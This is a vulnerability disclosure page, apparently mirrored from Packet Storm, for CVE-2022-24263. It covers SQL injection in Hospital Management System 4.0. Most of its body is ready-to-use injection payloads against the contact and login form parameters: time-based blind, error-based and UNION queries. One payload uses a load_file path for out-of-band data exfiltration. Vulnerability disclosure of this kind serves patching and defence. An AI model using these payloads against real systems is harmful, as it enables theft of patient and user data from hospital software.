Hospital Management System 4.0 SQL Injection

🗓️ 07 Feb 2022 00:00:00Reported by nu11secur1tyType

packetstorm🔗 packetstormsecurity.com👁 312 Views

Hospital Management System v4.0 Multiple SQL-Injections, critica

Reporter	Title	Published	Views	Family All 17
0day.today	Hospital Management System 4.0 SQL Injection Vulnerability	7 Feb 202200:00	–	zdt
ATTACKERKB	CVE-2022-24263	31 Jan 202222:15	–	attackerkb
Circl	CVE-2022-24263	1 Feb 202200:25	–	circl
CNNVD	Elite Graphix Elite Cms SQL注入漏洞	31 Jan 202200:00	–	cnnvd
CVE	CVE-2022-24263	31 Jan 202221:27	–	cve
Cvelist	CVE-2022-24263	31 Jan 202221:27	–	cvelist
Exploit DB	Hospital Management System 4.0 - 'multiple' SQL Injection	8 Feb 202200:00	–	exploitdb
EUVD	EUVD-2022-29170	3 Oct 202520:07	–	euvd
EUVD	EUVD-2022-29521	3 Oct 202520:07	–	euvd
NVD	CVE-2022-24263	31 Jan 202222:15	–	nvd

`## Title: Hospital Management System v4.0 Multiple SQL-Injections  
## Author: nu11secur1ty  
## Date: 02.06.2022  
## Vendor: https://github.com/kishan0725  
## Software: https://github.com/kishan0725/Hospital-Management-System  
## CVE-2022-24263  
  
  
## Description:  
The Hospital Management System v4.0 is suffering from Multiple  
SQL-Injections via three parameters in function.php, contact.php, and  
func3.php applications.  
The attacker can be receiving the all information from the system by  
using this vulnerability, and also the malicious actor can use  
sensitive information from the customers of this system.  
WARNING: If this is in some external domain, or some subdomain, or  
internal, this will be extremely dangerous!  
Status: CRITICAL  
  
  
[+] Payloads:  
  
```mysql  
---  
Parameter: txtName (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: txtName=821761' AND (SELECT 9346 FROM  
(SELECT(SLEEP(3)))HJGv) AND  
'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select  
load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send  
Message&txtMsg=441931  
---  
  
-------------------------------------------  
  
---  
Parameter: #1* ((custom) POST)  
Type: error-based  
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)  
Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)  
OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN  
1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING  
MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 1 column  
Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)  
UNION ALL SELECT  
8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login  
---  
  
-------------------------------------------  
  
---  
Parameter: #1* ((custom) POST)  
Type: error-based  
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)  
Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY  
CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0  
END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING  
MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 1 column  
Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT  
CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login  
---  
  
```  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263)  
  
## Proof and Exploit:  
[href](https://streamable.com/m4hnm1)  
  
`

07 Feb 2022 00:00Current

0.1Low risk

Vulners AI Score0.1

CVSS 27.5

CVSS 3.19.8

EPSS0.04944